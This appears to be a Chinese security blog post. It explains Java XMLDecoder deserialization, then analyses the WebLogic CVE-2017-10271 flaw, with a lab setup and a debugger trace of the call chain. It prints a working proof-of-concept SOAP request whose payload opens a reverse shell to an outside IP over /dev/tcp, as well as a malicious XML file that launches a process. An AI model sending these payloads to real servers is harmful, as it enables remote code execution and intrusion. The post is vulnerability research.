XMLEncoder与 XMLDecoder
使用XMLEncoder来生成表示JavaBeans组件(bean)的XML文档,用XMLDecoder读取使用 XMLEncoder 创建的XML文档获取JavaBeans
•XMLEncoder示例
`import javax.swing.*;``import java.beans.XMLEncoder;``import java.io.BufferedOutputStream;``import java.io.FileOutputStream;`` ``public class xmlencoder {` `public static void main(String[] args) throws Exception{` `XMLEncoder a = new XMLEncoder(new BufferedOutputStream(new FileOutputStream("test.xml")));` `a.writeObject(new JButton("test.test"));` `a.close();` `}``}`
生成的效果如下,在test.xml中
`<?xml version="1.0" encoding="UTF-8"?>``<java version="1.8.0_281" class="java.beans.XMLDecoder">` `<object class="javax.swing.JButton">` `<string>test.test</string>` `</object>``</java>`
•XMLDecoder示例
`import javax.swing.*;``import java.beans.XMLDecoder;``import java.beans.XMLEncoder;``import java.io.BufferedInputStream;``import java.io.BufferedOutputStream;``import java.io.FileInputStream;``import java.io.FileOutputStream;`` ``public class xmlencoder {` `public static void main(String[] args) throws Exception{` `XMLDecoder j = new XMLDecoder(new BufferedInputStream(new FileInputStream("test.xml")));` `Object result = j.readObject();` `System.out.println(result);` `j.close();` `}``}`
最终生成的打印结果为
javax.swing.JButton[,0,0,0x0,invalid,alignmentX=0.0,alignmentY=0.5,border=javax.swing.plaf.BorderUIResource$CompoundBorderUIResource@1b2c6ec2,flags=296,maximumSize=,minimumSize=,preferredSize=,defaultIcon=,disabledIcon=,disabledSelectedIcon=,margin=javax.swing.plaf.InsetsUIResource[top=2,left=14,bottom=2,right=14],paintBorder=true,paintFocus=true,pressedIcon=,rolloverEnabled=true,rolloverIcon=,rolloverSelectedIcon=,selectedIcon=,text=test.test,defaultCapable=true]
•string标签
test,test 字符串的在XML中表示方式为`<string>test.test</string>
•object标签
通过 <object> 标签表示对象, class 属性指定具体类(用于调用其内部方法), method 属性指定具体方法名称(比如构造函数的的方法名为 new ) new JButton("test,test") 对应的XML文档:
`<object class="javax.swing.JButton">` `<void method="setText">` `<string>test,test</string>` `</void>``</object>`
•void标签
通过 void 标签表示函数调用、赋值等操作, method 属性指定具体的方法名称。 JButton b = new JButton();b.setText("Hello, world"); 对应的XML文档:
`<object class="javax.swing.JButton">` `<void method="setText">` `<string>Hello,xml</string>` `</void>``</object>`
•array标签
通过 array 标签表示数组, class 属性指定具体类,内部 void 标签的 index 属性表示根据指定数组索引赋值。String[] s = new String[3];s[1] = "Hello,xml"; 对应的XML文档:
`<array class="java.lang.String" length="3">` `<void index="1">` `<string>Hello,xml</string>` `</void>``</array>`
•这里的示例代码还是使用原来的代码
`public static void main(String[] args) throws Exception{` `XMLDecoder j = new XMLDecoder(new BufferedInputStream(new FileInputStream("test.xml")));` `Object result = j.readObject();` `j.close();` `}`
•这里将原有的test.xml修改为恶意XML
`<?xml version="1.0" encoding="UTF-8"?>``<java version="1.8.0_112" class="java.beans.XMLDecoder">``<void class="java.lang.ProcessBuilder">` `<array class="java.lang.String" length="1">` `<void index="0">` `<string>calc</string>` `</void>` `</array>` `<void method="start"/>``</void>``</java>`
•运行弹出计算器
这里的docker我是使用的kali中的
•docker的8453开启,位于docker-compose.yml
`version: '2'``services:``weblogic:``image: vulhub/weblogic``ports:``- "7001:7001"``- "8453:8453"`
•下载运行镜像
•修改/root/Oracle/Middleware/user_projects/domains/base_domain/bin/setDomainEnv.sh
添加代码
`debugFlag="true"``export debugFlag`
•重启docker
•把 weblogic的源码和jdk包都拷贝出来
docker cp 9bc5c6e5290c:/root ./test/
•拷贝到我的代码机器
•idea打开root\Oracle\Middleware目录•把Middleware目录下所有的*.jar包都放在一个libjar的文件夹
find ./ -name *.jar -exec cp {} ./libjar/ \;
•idea中的jdk设置为环境自带的1.6
•idea添加依赖库
•远程调试
•开启debug
•下断点
•发包,出现这样的情况说明环境搭建成功
•受影响版本:
`WebLogic 10.3.6.0.0``WebLogic 12.1.3.0.0``WebLogic 12.2.1.1.0``WebLogic 12.2.1.2.0`
CVE-2017-3506与CVE-2017-10271均为XMLDecoder反序列化漏洞。CVE-2017-3506修补方案为禁用object标签。CVE-2017-10271是通过void、new标签对CVE-2017-3506补丁的绕过。
•poc
`POST /wls-wsat/CoordinatorPortType11 HTTP/1.1``Host: xxx.xxx.xxx.xxx:7001``Accept-Encoding: identity``Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3``Accept: */*``User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0``Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3``Connection: keep-alive``Content-Type: text/xml;charset=UTF-8``Content-Length: 648`` ``<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>``<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">``<java version="1.4.0" class="java.beans.XMLDecoder">``<void class="java.lang.ProcessBuilder">``<array class="java.lang.String" length="3">``<void index="0">``<string>/bin/bash</string>``</void>``<void index="1">``<string>-c</string>``</void>``<void index="2">``<string>/bin/sh -i > /dev/tcp/107.173.81.94/6666 2<&1 0<&1</string>``</void>``</array>``<void method="start"/></void>``</java>``</work:WorkContext>``</soapenv:Header>``<soapenv:Body/>``</soapenv:Envelope>`
使用burp发包,查看返回包,查看调用链
•断点打到weblogic/wsee/jaxws/workcontext/WorkContextServerTube.class:37
•使用burp发包,进入断点,看到var1的值为传入的恶意数据,var2为message中的header,var3为获取WorkAreaConstants.WORK_AREA_HEADER=http://bea.com/2004/06/soap/workarea/
•var3不等于空,进入readHeaderOld 方法
`weblogic/wsee/jaxws/workcontext/WorkContextTube.class:102``var2.nextTag(); 跳转到worktag``var2.nextTag(); 跳转到javatag`
通过XMLStreamWriterFactory.create函数获取恶意的Payload到var4中,var4的字节数组输入流传入WorkContextXmlInputAdapter的构造函数。
•weblogic/wsee/workarea/WorkContextXmlInputAdapter.class:19
`public WorkContextXmlInputAdapter(InputStream var1) {` `this.xmlDecoder = new XMLDecoder(var1);` `}`
将恶意的xml作为参数传入了XMLDecoder的构造函数,然后返回一个WorkContextXmlInputAdapter实例对象到上层的var6,var6作为参数传入receive函数。
•weblogic/wsee/jaxws/workcontext/WorkContextServerTube.class:69
-WorkContextXmlInputAdapter对象又被传入了WorkContextMapImpl类的receiveRequest方法。
•weblogic/workarea/WorkContextMapImpl.class:142
•weblogic/workarea/WorkContextLocalMap.class:162
又被传到receiveRequest方法中
•workarea/spi/WorkContextEntryImpl.class:72
又被传到readEntry方法中
String var1 = var0.readUTF();
•weblogic/wsee/workarea/WorkContextXmlInputAdapter.class:104
`public String readUTF() throws IOException {` `return (String)this.xmlDecoder.readObject();` `}`
触发this.xmlDecoder.readObject(); 反序列化,完成代码执行
[1] Weblogic XMLDecoder 漏洞触发链分析: https://zhuanlan.zhihu.com/p/112870627
[2] Java安全初遇-XMLDecoder与Weblogic齐活儿: https://xz.aliyun.com/t/8039
分享、点赞、在看就是对我们的一种支持!